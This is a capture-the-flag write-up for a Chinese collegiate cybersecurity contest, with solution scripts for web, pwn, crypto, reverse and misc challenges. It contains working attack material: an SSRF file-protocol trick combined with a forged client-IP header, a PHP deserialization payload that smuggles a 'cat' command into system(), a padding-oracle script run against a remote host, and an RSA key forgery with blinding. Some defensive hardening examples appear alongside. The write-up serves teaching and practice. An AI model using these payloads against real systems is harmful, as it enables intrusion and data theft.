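“駭極杯” (Haiji Cup) National College Student Cybersecurity Invitational: First-Hand WriteUp
Special thanks to the author of this article: flam4nplus
The author has taken part in the “安恆杯” (Anheng Cup) many times with impressive results.
In this “駭極杯”, his team achieved
rank 7 and AK'd (solved all of) both re and crypto.
~Congratulations!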
Web
web1
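First, capture the traffic with burpsuite.
Change GET to POST, and post admin=1.
Visit robots.txt.
It reveals source.php and flag.php.
Visiting flag.php yields nothing, so the only option is to look at source.php.
Here we can see that the IP needs to be forged. There are only a few ways to forge an IP in the headers: xff, xci, clientip, remoteaddr.
Here we add X-Client-IP:127.0.0.1
Then continue by posting url.
Now we can see that an image is loaded.
I was stuck here for a long time, then it suddenly occurred to me that, since it is 127.0.0.1, it might be the file protocol, so I tried it.
It still loads, and the image above also shows that the result is html rather than jpg, so curl it here.
This also got us the challenge source code: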
<?php
error_reporting(0);
include "flag.php";
echo "you need to login as admin!";
echo "<!-- post param 'admin' -->";
if(isset($_POST['admin'])) {
    if($_POST['admin']==1) {
        if($_SERVER['HTTP_X_CLIENT_IP']) {
            if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.ichunqiu.com') {
                $curl = curl_init();
                curl_setopt($curl, CURLOPT_URL, $_POST['url']);
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                $content = curl_exec($curl);
                curl_close($curl);
                $filename='download/'.rand().';img1.jpg';
                file_put_contents($filename,$content);
                echo $_POST['url'];
                $img="<img src=\"".$filename."\"/>";
                echo $img;
            } else {
                echo "you need post url: http://www.ichunqiu.com";
            }
        } else {
            echo "only 127.0.0.1 can get the flag!!";
        }
    }
} else {
    $_POST['admin']=0;
}
And with that, we got the flag.
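The host test from source.php, mirrored in Python as an added example (not part of the original write-up or the challenge code): it compares only the host, so the URL scheme is never constrained, while the stricter check also pins the scheme. The scheme allowlist, the function names and the sample URLs are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

ALLOWED_HOST = "www.ichunqiu.com"     # the host source.php compares against
ALLOWED_SCHEMES = {"http", "https"}   # assumption: only web fetches are intended

def host_only_check(url):
    """Mirror of the challenge's test: only the host component is compared."""
    return urlsplit(url).hostname == ALLOWED_HOST

def strict_check(url):
    """Pin the scheme as well as the host, and refuse embedded credentials."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    return parts.hostname == ALLOWED_HOST

def disagreements(urls):
    """URLs that the host-only test accepts but the strict test rejects."""
    return [u for u in urls if host_only_check(u) and not strict_check(u)]

# Constructed sample inputs (not taken from the challenge traffic).
SAMPLES = [
    "http://www.ichunqiu.com/logo.png",
    "https://www.ichunqiu.com/",
    "file://www.ichunqiu.com/tmp/example.txt",
    "http://example.org/",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, host_only_check(url), strict_check(url))
    print("accepted by host-only check alone:", disagreements(SAMPLES))
```

In PHP the same restriction can be enforced in the fetch itself with curl_setopt($curl, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS).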
web2
For this challenge, a scanner first turned up the leaked source code:
<?php
error_reporting(0);
class come{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
    if($i===1) {
        $i++;
        $$key = $value;
    }
    else{break;}
}
if($first==="doller") {
    @parse_str($_GET['a']);
    if($var==="give") {
        if($bbb==="me") {
            if($ccc==="flag") {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come);
            }
        }
        else {echo "<br>think about it<br>";}
    }
    else {
        echo "NO";
    }
}
else {
    echo "Can you hack me?<br>";
}
?>
Next comes a deserialization vulnerability.
Just use the Firefox F12 hackbar:
http://8c2a8dee973d47ffbf0027140ec9e6dfc88e980052e84454.game.ichunqiu.com/?first=doller&a=var=give%26bbb=me%26ccc=flag
come=O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123
This gives the flag directly.
Misc
Sign-in
Very simple base32; just decode it with an online decoder.
MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q
easy-py
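I happened to write a challenge of this type before, but the WP I wrote back then was too brief, and I had forgotten most of the pyc bytecode. This time I quickly gathered some material and saved the relevant information.
Reference links:
https://github.com/python/cpython/blob/master/Include/opcode.h
https://bbs.pediy.com/thread-246683.htm
https://das.scusec.org/2017/03/24/pythonopcode/
http://unpyc.sourceforge.net/Opcodes.html
The opcodes, after sorting them out, are as follows: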
03f3 0d0a bebc ce5b
63 00 0000 00 00 000000 0f 0000 00 40 0000 00
73 b200 0000                      length 178
710600 JUMP_ABSOLUTE
642333 LOAD_CONST
710900 JUMP_ABSOLUTE              12 of them
640000 LOAD_CONST 0
640100 LOAD_CONST 1
640200 LOAD_CONST 2
640300 LOAD_CONST 3
640400 LOAD_CONST 4
640500 LOAD_CONST 5
640200 LOAD_CONST 2
640600 LOAD_CONST 6
640600 LOAD_CONST 6
640700 LOAD_CONST 7
640800 LOAD_CONST 8
640900 LOAD_CONST 9
640a00 LOAD_CONST a
640b00 LOAD_CONST b
640c00 LOAD_CONST c
670f00 BUILD_LIST f               cmp[0xf]
5a0000 STORE_NAME 0               m[0xf]=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]
650100 LOAD_NAME 1                raw_input
830000 CALL_FUNCTION 0
5a0200 STORE_NAME 2               flag
640000 LOAD_CONST 0               0
5a0300 STORE_NAME 3               m=0
{
785b00 SETUP_LOOP                 while
650200 LOAD_NAME 2                flag
44 GET_ITER
5d5300 FOR_ITER
5a0400 STORE_NAME 4               i=..
650500 LOAD_NAME 5                ord
650400 LOAD_NAME 4
830100 CALL_FUNCTION              ord(i)
0f UNARY_INVERT                   ~
640d00 LOAD_CONST d               102
40 BINARY_AND                     &
650500 LOAD_NAME 5
650400 LOAD_NAME 4
830100 CALL_FUNCTION 1            ord(i)
641200 LOAD_CONST 0x12            -103
40 BINARY_AND                     &
42 BINARY_OR                      |
5a0400 STORE_NAME 4               i=..
650400 LOAD_NAME 4
650000 LOAD_NAME 0                cmp
650300 LOAD_NAME 3                m
19 BINARY_SUBSCR                  []
6b0200 COMPARE_OP 2               ==
7290 00 POP_JUMP_IF_FALSE
650300 LOAD_NAME 3                m
0b UNARY_NEGATIVE                 -m
640e00 LOAD_CONST 0xe             -1
17 BINARY_ADD                     +
0b UNARY_NEGATIVE                 -
5a0300 STORE_NAME 3               m=...
714900 JUMP_ABSOLUTE
714900 JUMP_ABSOLUTE
640f00 LOAD_CONST f               wrong
47 PRINT_ITEM
48 PRINT_NEWLINE
650600 LOAD_NAME 6                exit
830000 CALL_FUNCTION 0
01 POP_TOP
714900 JUMP_ABSOLUTE
57 POP_BLOCK
641000 LOAD_CONST                 right
47 PRINT_ITEM
48 PRINT_NEWLINE
641100
53 return
28 (STORE_SLICE 130000 00
69 0000 0000
69 0a 000000
69 0700 0000
69 0100 00 00
69 1d00 0000
69 0e00 00 00
69 1600 0000
69 1f 0000 00
69 39000000
69 1e 0000 00
69 0900 0000
69 34 000000
69 1b00 0000
69 66 0000 00
69 ffff ffff
74 0500 00 00 7772 6f6e67         wrong
74 05 0000 00 7269 67 6874        right
4e69 99ff ffff
28( 07 0000 00
74 0300 0000 636d 70              cmp
74 0900 0000 7261 775f696e 7075 74    raw_input
74 0400 0000 666c 6167            flag
74 010000 00 6d                   m
74 01 0000 00 69                  i
74 03 0000 00 6f7264              ord
74 04 0000 00 65 7869 74          exit
)
28 0000 0000
28 00 0000 00
28 0000 0000
73 0a 0000 00 65 6173 795f 7079 2e70 79    easy_py.pyc
74 0800 0000 3c6d 6f64 756c 653e  <module>
0100 0000
73 14 0000 00 33 01 09 01 06 010d 011f 0110 010c 0106 0205 010b 02
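While solving it I ran into a pitfall: the opcode lists online are incomplete, so for
6b0200 COMPARE_OP 2 ==
7290 00 POP_JUMP_IF_FALSE
I had no idea what they were for a long time and struggled with them.
The decryption script is as follows: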
cmp=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]
flag=[]
j=0
for c in range(15):
    for i in range(255):
        if cmp[j] == ((~i)&102)|(i&(-103)):
            j=j+1
            flag.append(chr(i))
            break
print "".join(flag)
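Added example (not part of the original write-up): the expression recovered from the bytecode selects bits the way a multiplexer does and is the same as XOR with 102, because -103 is ~102, so the table decodes without a search loop. The function names are illustrative; the table is the one from the page, and the check over every key generalizes beyond the single constant used in the challenge.

```python
# The comparison table recovered from the pyc constants (from the page).
CMP = [0, 10, 7, 1, 29, 14, 7, 22, 22, 31, 57, 30, 9, 52, 27]
KEY = 102  # LOAD_CONST 102; the second constant, -103, is its complement

def transform(x, key=KEY):
    """Per-character transform as read from the disassembly:
    (~x & key) | (x & ~key). With key=102, ~key is -103."""
    return ((~x) & key) | (x & ~key)

def mux_equals_xor(key):
    """True when the and/or form equals x ^ key for every byte value x."""
    return all(transform(x, key) == x ^ key for x in range(256))

def decode(values, key=KEY):
    """XOR is its own inverse, so each table entry decodes in one step."""
    return "".join(chr(v ^ key) for v in values)

def roundtrip_ok(values, key=KEY):
    """Re-apply the bytecode's transform to the decoded text and compare."""
    return [transform(ord(ch), key) for ch in decode(values, key)] == list(values)

if __name__ == "__main__":
    print("identity holds for key 102:", mux_equals_xor(KEY))
    print("identity holds for all keys:", all(mux_equals_xor(k) for k in range(256)))
    print("decoded:", decode(CMP))
    print("round trip matches table:", roundtrip_ok(CMP))
```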
Pwn
aessss
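After getting the source, we found that the unpad function has no check; by modifying unpad, the flag can be brute-forced byte by byte from back to front to obtain the final flag.
The script is as follows: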
from pwn import *
import base64, time, random, string
from Crypto.Cipher import AES
from Crypto.Hash import SHA256, MD5
#context.log_level = 'debug'

def choice1():
    p.sendline('1')
    p.recvuntil('Here is the encrypted flag: 0x', drop = True)
    enflag = p.recvuntil('\nWelcome to AES(WXH) encrypt system.', drop = True)
    #print enflag
    p.recvuntil('Your choice:', drop = True)
    return enflag

def choice2(pad):
    p.sendline('2')
    p.recvuntil('Pad me something:', drop = True)
    p.sendline(pad)
    p.recvuntil('Your choice:', drop = True)

def bypassproof():
    p.recvuntil('sha256(XXXX+')
    lastdata = p.recvuntil(')', drop=True)
    print lastdata
    p.recvuntil(' == ')
    digest = p.recvuntil('\nGive me XXXX:', drop=True)
    print digest
    def proof(s):
        return SHA256.new(s + lastdata).hexdigest() == digest
    data = pwnlib.util.iters.mbruteforce(proof, string.ascii_letters + string.digits, 4, method='fixed')
    print data
    p.sendline(data)
    #p.recvuntil('Done!\n')

p = remote('106.75.13.64', 54321)
bypassproof()
p.recvuntil('Your choice:', drop = True)
flag_enc = choice1()
#print encflag
flag = ""
for i in range(33):
    a = ''.join(['a' for _ in range(223)])
    a = a[:-1] + chr(224 + i)
    for c in string.printable:
        #print c+flag
        choice2(a)
        choice2(c+flag)
        if choice1() == flag_enc:
            flag = c + flag
            print "success:"+flag
            break
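An added example, not code from the challenge or the original write-up: an unpad that trusts the last byte, next to a strict PKCS#7 unpad. The challenge source is not shown on the page, so the unchecked version is an assumed shape of the missing check, and the 16-byte block size and the sample buffers are constructed.

```python
import hmac

BLOCK = 16  # AES block size in bytes

def pad(data: bytes) -> bytes:
    """PKCS#7: append n bytes of value n, with 1 <= n <= BLOCK."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad_unchecked(buf: bytes) -> bytes:
    """Assumed shape of an unpad with no check: trust the last byte."""
    return buf[:-buf[-1]]

def unpad_strict(buf: bytes) -> bytes:
    """Reject any buffer whose padding is not well-formed PKCS#7."""
    if not buf or len(buf) % BLOCK:
        raise ValueError("length is not a positive multiple of the block size")
    n = buf[-1]
    if not 1 <= n <= BLOCK:
        raise ValueError("padding length out of range")
    if not hmac.compare_digest(buf[-n:], bytes([n]) * n):
        raise ValueError("padding bytes do not match")
    return buf[:-n]

def try_unpad(unpad, buf: bytes):
    """Return the unpadded data, or None when the unpad rejects the buffer."""
    try:
        return unpad(buf)
    except ValueError:
        return None

# Constructed samples: 20 data bytes, so pad() appends twelve 0x0c bytes.
GOOD = pad(b"A" * 20)
OVERLONG = GOOD[:-1] + bytes([30])  # last byte claims 30 bytes of padding
MISMATCH = GOOD[:-1] + bytes([5])   # claims 5, but the other four are 0x0c

if __name__ == "__main__":
    for name, buf in (("good", GOOD), ("overlong", OVERLONG), ("mismatch", MISMATCH)):
        print(name, try_unpad(unpad_unchecked, buf), try_unpad(unpad_strict, buf))
```

Strict unpadding removes the silent truncation; the client should still be unable to tell a padding failure from any other failure, which in practice means authenticating the ciphertext before unpadding.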
Crypto
rsaaaa
First, the proof has to be passed. The script is as follows:
# Python 2
import string
from hashlib import sha512

def brute_force(pad, shavalue):
    dict = string.letters + string.digits
    key = ""
    for i1 in dict:
        tmp = key
        key1 = tmp + i1
        for i2 in dict:
            tmp = key1
            key2 = tmp + i2
            for i3 in dict:
                tmp = key2
                key3 = tmp + i3
                for i4 in dict:
                    tmp = key3
                    key4 = tmp + i4
                    final_key = key4
                    if sha512(pad+key4).hexdigest()==shavalue:
                        print key4
                        return key4

key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1
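Next, the problem here has to be solved.
It turns out there is no need to solve for its d and n at all.
Just use d=1, n=c-m.
That goes straight to the next stage.
A bit of math is needed here: first compute cc = pow(2, e, n), then compute ccc = c*cc%n, then send ccc to the server for decryption, and divide the returned plaintext by 2.
The result is MM.
After posting it, AES-decrypt directly to get the flag.
The whole interaction is as follows: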
sha512(XkJ6v0Svif9H5wWd+XXXX) == 6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5
Tell me XXXX: ZTmx
OK, you proof.
Give you a message:0x6f57434e74344a6a4831485177694169 and its ciphertext:0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8
Please give me the private key to decrypt cipher
n: 22084145559267142542278247205711206806769035096867203562084376236135074979071593494695165415304475011906014512427242327757399235206725659075262541485105057336477881466546208394134375073948200202231086452529564372313656850419369453050936175671378881331075871605986332054320133956210417108252203550155296981956383715305509205993100035845876676100308496728282263311014876821564144113735314621093460404122348973685951350134860330087006324081818356485787747916004167088733576488568724106608053548411305492271813170870510029120401564662767509523812680234467117029176109380429489145638460342248988331319677739729495421826415
d: 1
Oh, how you know the private key!
n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0
Now, you have a chance to decrypt something(but no c): 10861852131164322077412797986625616181717063053353581369663738748831496772954289381470035381197611133580693273961257855424019526480196780126545278666064266535981465755567420264745935227134754534350002537986969850551526328493939419096511440892423045037104987011041181269866090307965509267257918136812218547637066029308872688916113197541758600923169257485066711422003515732668822443487279464330075761022284709750952016470762309134261713817800958762289127439071427678699871872454105477099012449462911427691966935866152040055058801656487819090362844926572779942769475645537130146301058513228439997764047914117721832371520
message:0xce6adae4ac9ec86c8ee264a28ae2a46e
Give me right message: 137187895140717694653920589162394767927
Master in math! Here is your flag:0x4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0
The exp is as follows:
#!/usr/bin/python
import random
import string
from hashlib import sha512
from Crypto.Util.number import *
from Crypto.Cipher import AES
'''
def brute_force(pad, shavalue):
    dict = string.letters + string.digits
    key = ""
    for i1 in dict:
        tmp = key
        key1 = tmp + i1
        for i2 in dict:
            tmp = key1
            key2 = tmp + i2
            for i3 in dict:
                tmp = key2
                key3 = tmp + i3
                for i4 in dict:
                    tmp = key3
                    key4 = tmp + i4
                    final_key = key4
                    if sha512(pad+key4).hexdigest()==shavalue:
                        print key4
                        return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1
m = 0x6f57434e74344a6a4831485177694169
c = 0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8
print c-m
n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0
cc = pow(2,e,n)
ccc = c*cc%n
print ccc
m = 0xce6adae4ac9ec86c8ee264a28ae2a46e
print m/2
'''
enc_flag = '4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0'
enc_flag = enc_flag.decode('hex')
msg1 = '6f57434e74344a6a4831485177694169'.decode('hex')
msg2 = '67356d72564f64364771325145715237'.decode('hex')
cipher = AES.new(msg2, AES.MODE_CBC, msg1)
dec = cipher.decrypt(enc_flag)
print dec
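The two rsaaaa steps above, worked through with a toy key as an added example that is not the author's exp or the server's code: it assumes the server's key check is pow(c, d, n) == m with caller-supplied n and d, and that the decrypt service refuses only c itself. The primes, the message and the function names are constructed.

```python
# Toy parameters (constructed): two Mersenne primes, far too small for real use.
P, Q, E = 2**31 - 1, 2**61 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))   # the real private exponent

def weak_key_check(m, c, n, d):
    """Assumed server check: trusts whatever n and d the caller supplies."""
    return pow(c, d, n) == m

def strict_key_check(m, c, n, d):
    """Hardened check: the modulus must be the server's own public modulus."""
    return n == N and pow(c, d, n) == m

def forged_key(m, c):
    """c = (c - m) + m, so c mod (c - m) == m whenever c > 2*m; d = 1 suffices."""
    return c - m, 1

def decrypt_oracle(x, forbidden):
    """Textbook-RSA decryption that refuses only the exact target ciphertext."""
    if x == forbidden:
        raise ValueError("refused")
    return pow(x, D, N)

def recover_via_blinding(c):
    """Dec(c * 2^e mod n) = 2*m mod n; halving is exact while 2*m < n."""
    blinded = c * pow(2, E, N) % N
    return decrypt_oracle(blinded, forbidden=c) // 2

M = int.from_bytes(b"session!", "big")   # constructed 64-bit message
C = pow(M, E, N)

if __name__ == "__main__":
    n_f, d_f = forged_key(M, C)
    print("weak check accepts forged key:  ", weak_key_check(M, C, n_f, d_f))
    print("strict check accepts forged key:", strict_key_check(M, C, n_f, d_f))
    print("strict check accepts real key:  ", strict_key_check(M, C, N, D))
    print("blinding recovers the plaintext:", recover_via_blinding(C) == M)
```

Pinning the modulus closes the first step; the second exists because unpadded RSA is multiplicative, which RSA-OAEP from a vetted library removes.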
Reverse
cpp
A sign-in challenge, more or less. If you know a little C++ it won't feel that unfamiliar.
fake=[0x99, 0xb0, 0x87, 0x9e, 0x70, 0xe8, 0x41, 0x44, 0x05, 0x04, 0x8b, 0x9a, 0x74, 0xbc, 0x55, 0x58, 0xb5, 0x61, 0x8e, 0x36, 0xac, 0x09, 0x59, 0xe5, 0x61, 0xdd, 0x3e, 0x3f, 0xb9, 0x15, 0xed, 0xd5]
a = 0x99
b = 0xb0
c = 0x87
d = 0x9e
flag=[]
src=[0 for i in range(32)]
xor1=[0 for i in range(32)]
xor2=[0 for i in range(32)]
xor3=[0 for i in range(32)]
xor4=[0 for i in range(32)]
src[0]=a
src[1]=b
src[2]=c
src[3]=d
xor1[0]=a
xor1[1]=b^a
xor1[2]=a^b^c
xor1[3]=a^b^c^d
xor2[0]=a
xor2[1]=b
xor2[2]=a^c
xor2[3]=d^b
xor3[0]=a
xor3[1]=a^b
xor3[2]=c^b
xor3[3]=d^c
xor4[0]=a
xor4[1]=b
xor4[2]=c
xor4[3]=d
for i in range(4,32):
    for j in range(255):
        src[i]=j
        xor1[i]=(xor1[i-1]^src[i])&0xff
        xor2[i]=(xor2[i-1]^xor1[i])&0xff
        xor3[i]=(xor3[i-1]^xor2[i])&0xff
        xor4[i]=(xor4[i-1]^xor3[i])&0xff
        if xor4[i]==fake[i]:
            break
for i in range(32):
    for j in range(256):
        tmp = j*4
        result = (((j>>6)|tmp)^i)&0xff
        if result == src[i]:
            flag.append(chr(j))
            break
print "".join(flag)#flag{W0w_y0u_m4st3r_C_p1us_p1us}
flag{W0w_y0u_m4st3r_C_p1us_p1us}
cyvm
This one was only released near the end; it is a very simple vm challenge. The bytecode is as follows:
op d1 d2
[0x0F,                scanf(%s) s
0x10, 0x14, 0x20,     r0=0x20
0x10, 0x16, 0x00,     r2=0
0x09, 0x24,           point=0x24 jmp code[0x24]
label code[0x9]:
0x02, 0x15, 0x16,     r1=s[r2] r2=0 r1=s[0]
0xE9,                 ++i
0x12, 0x16,           v2 = 2 r2++ r2=1
0xE8,                 ++i
0x02, 0x17, 0x16,     r3=s[r2] r3=s[1]
0x13, 0x16,           v3 = 2 r2-- r2=0
0x90,                 ++i
0x06, 0x15, 0x17,     r1=r1^r3 r1=s[0]^s[1]
0x45,                 ++i
0x06, 0x15, 0x16,     r1=r1^r2 r1=s[0]^s[1]^r2
0x76,                 ++i
0x01, 0x15, 0x16,     s[r1]=r2 s[r1]=0
0x12, 0x16,           v2=2 r2++
0xFF,                 ++i
label code[0x24]:
0x0A, 0x14, 0x16,     v9 = r0 != r2
0x0C, 0x09,           if(v9) true point = d1
0x0E                  sub_4006d6()!=0
Decryption script:
c = [0x0A, 0x0C, 0x04, 0x1F, 0x48, 0x5A, 0x5F, 0x03, 0x62, 0x67, 0x0E, 0x61, 0x1E, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7C, 0x39, 0x54, 0x4B, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0E, 0x62]
# flag=[]
# encode() is never called; it only records the forward transform of the vm
def encode():
    flag='a'*0x20
    for i in range(32):
        c[i]=flag[i]^flag[i+1]^i
# walk backwards from the known last character '}' (125)
def decode():
    flag=["}"]
    a=[]
    tmp = 125
    for i in range(30,-1,-1):
        tmp = c[i]^tmp^i
        flag.append(chr(tmp))
    print "".join(flag[::-1])
decode()
flag{7h15_15_MY_f1rs7_s1mpl3_Vm}
What's_it
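The first part: brute-force a 6-character a-z string against md5 to get the luck string ozulmt.
It then enters a self-decoding part, and what follows is the real flag verification. It first verifies the flag format, extracts the content once the format has been handled, and finally compares it with fixed data.
The brute-force script is as follows: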
import hashlib
import string
dic = string.ascii_lowercase
may_fla = []
for i in dic:
    for j in dic:
        for m in dic:
            for n in dic:
                for p in dic:
                    for q in dic:
                        flag=i+j+m+n+p+q
                        # print flag
                        hl = hashlib.md5()
                        hl.update(flag.encode(encoding='utf-8'))
                        flag_md5 = hl.hexdigest()
                        count=0
                        index_sum=0
                        for c in range(32):
                            if flag_md5[c] == '0':
                                count = count+1
                                index_sum = index_sum+c
                        if (10*count+index_sum) == 403:
                            may_fla.append(flag)
print may_fla
The decryption script is as follows:
# flag{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}
# flag="flag{"
# flag[13]="-"
# flag[18]="-"
# flag[28]="-"
# flag[23]="-"
# flag[41]="}"
c=[0x61, 0x31, 0x39, 0x37, 0x62, 0x38, 0x34, 0x37, 0x37, 0x30, 0x39, 0x32, 0x35, 0x33, 0x61, 0x34, 0x37, 0x63, 0x34, 0x31, 0x62, 0x63, 0x37, 0x64, 0x36, 0x64, 0x35, 0x32, 0x65, 0x36, 0x39, 0x64]
flag = []
for i in c:
    flag.append(chr(i))
print "".join(flag)# flag{a197b847-7092-53a4-7c41-bc7d6d52e69d}